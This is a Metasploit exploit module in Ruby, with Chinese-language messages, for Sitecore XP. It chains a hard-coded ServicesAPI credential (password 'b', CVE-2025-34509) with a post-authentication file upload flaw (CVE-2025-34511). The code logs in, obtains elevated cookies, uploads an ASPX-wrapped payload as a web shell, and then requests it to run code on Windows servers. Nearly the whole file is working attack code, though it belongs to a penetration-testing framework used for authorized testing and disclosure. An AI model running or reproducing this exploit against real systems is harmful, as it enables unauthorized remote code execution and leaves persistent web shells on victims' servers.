##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Sitecore XP post-authentication file upload (CVE-2025-34511) in the
  # PowerShell Extensions module, chained with the hard-coded ServicesAPI
  # credential (CVE-2025-34509, see 'Description') for the initial login.
  #
  # Flow: login_identitysrv -> get_identity_cookies -> multipart POST to
  # PowerShellUploadFile2.aspx -> GET the uploaded .aspx to run the payload.
  # The module declares IOC_IN_LOGS and ARTIFACTS_ON_DISK in 'Notes': the
  # uploaded .aspx stays on the target unless removed by other means.
  #
  # login_identitysrv, get_identity_cookies and get_version come from the
  # SitecoreXp HTTP mixin; their return-value semantics are not visible here.
  include Msf::Exploit::Remote::HTTP::SitecoreXp
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sitecore XP CVE-2025-34511 后认证文件上传',
        'Description' => %q{
此模块利用 CVE-2025-34511,这是 PowerShell 扩展中的一个文件上传漏洞。该模块还利用 CVE-2025-34509(ServicesAPI 账户的硬编码凭证)来获得初始访问权限。
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Piotr Bazydlo', # discovery
          'msutovsky-r7' # module author
        ],
        'References' => [
          [ 'CVE', '2025-34511' ],
          ['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],
          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Windows',
            {
              'Arch' => [ARCH_X86, ARCH_X64]
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DisclosureDate' => '2025-06-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, '易受攻击端点的路径', '/']),
    ])
  end

  # Determines whether the target looks like a vulnerable Sitecore instance.
  #
  # Order of evidence: (1) the identity-server login with the ServicesAPI
  # account and the literal password 'b' must succeed, (2) elevated identity
  # cookies must be obtainable, (3) the PowerShell Extensions upload handler
  # must answer 200, (4) the reported version must fall in 10.0.0..10.4.
  # Steps (1) and (2) record @is_logged / @is_elevated so that exploit does
  # not repeat them when AutoCheck ran this method first.
  #
  # @return [Exploit::CheckCode] Unknown, Safe or Vulnerable with a reason
  def check
    return Exploit::CheckCode::Unknown('无法登录,应用程序可能不是 Sitecore') unless login_identitysrv('ServicesAPI', 'b')

    @is_logged = true
    return Exploit::CheckCode::Safe('无法获取提升权限的 cookies') unless get_identity_cookies

    @is_elevated = true
    # NOTE(review): if get_version can return nil, the between? call below
    # raises NoMethodError instead of returning a CheckCode — confirm against
    # the SitecoreXp mixin.
    sitecore_version = get_version
    # Probe the upload handler itself; a non-200 answer is taken to mean the
    # PowerShell Extensions module is not installed.
    res = send_request_cgi({
      'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
      'method' => 'GET',
      'vars_get' => { 'hdl' => '1245516121' }
    })
    return Exploit::CheckCode::Safe('未检测到 PowerShell 扩展,目标 Sitecore 实例中可能未安装') unless res&.code == 200

    # between? is inclusive at both ends; '10.4' is compared as a Rex::Version.
    return Exploit::CheckCode::Vulnerable("检测到 Sitecore 版本为 #{sitecore_version},该版本存在漏洞") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))

    Exploit::CheckCode::Safe("检测到 Sitecore 版本为 #{sitecore_version},该版本不存在漏洞")
  end

  # Uploads the ASPX-wrapped payload through PowerShellUploadFile2.aspx.
  #
  # Sets @webshell (random 15-letter name with .aspx extension) and @item_uri
  # (random 8-letter ItemUri); trigger_webshell later requests the file at
  # .../UploadFile/<@item_uri>/<@webshell>, so both values are the on-disk
  # artifacts a responder should look for. The payload body is posted as the
  # multipart part named after @item_uri with filename @webshell.
  #
  # @return [Boolean] true when the upload request returned HTTP 200
  def upload_webshell
    @webshell = "#{Rex::Text.rand_text_alpha(15)}.aspx"
    @item_uri = Rex::Text.rand_text_alpha(8)
    exe = generate_payload_exe
    # Wrap the native payload in an ASPX page so the web server executes it.
    asp = Msf::Util::EXE.to_exe_aspx(exe)
    data_post = Rex::MIME::Message.new
    data_post.add_part(@item_uri, nil, nil, %(form-data; name="ItemUri"))
    data_post.add_part('en', nil, nil, %(form-data; name="LanguageName"))
    data_post.add_part('0', nil, nil, %(form-data; name="Overwrite"))
    data_post.add_part('0', nil, nil, %(form-data; name="Unpack"))
    data_post.add_part('en', nil, nil, %(form-data; name="Versioned"))
    data_post.add_part(asp, 'text/plain', nil, %(form-data; name="#{@item_uri}"; filename="#{@webshell}"))
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
      'vars_get' => { 'hdl' => '1245516121' },
      'data' => data_post.to_s,
      'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
    })
    return false unless res&.code == 200

    true
  end

  # Requests the uploaded ASPX page so the server executes the payload.
  # Relies on @item_uri and @webshell set by upload_webshell.
  #
  # @return [Rex::Proto::Http::Response, nil] whatever send_request_cgi returns
  def trigger_webshell
    send_request_cgi({
      'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell),
      'method' => 'GET'
    })
  end

  # Main entry point: authenticate (unless check already did), obtain the
  # elevated cookies (unless check already did), upload and trigger the
  # payload. Each failure is reported through fail_with.
  def exploit
    # Skip the login when check has already established the session.
    if !@is_logged && !login_identitysrv('ServicesAPI', 'b')
      fail_with(Failure::NoAccess, '登录失败,请检查凭证')
    end
    if !@is_elevated && !get_identity_cookies
      fail_with(Failure::Unknown, '获取提升权限的 cookies 失败')
    end
    fail_with(Failure::PayloadFailed, '上传 webshell 失败') unless upload_webshell

    trigger_webshell
  end
end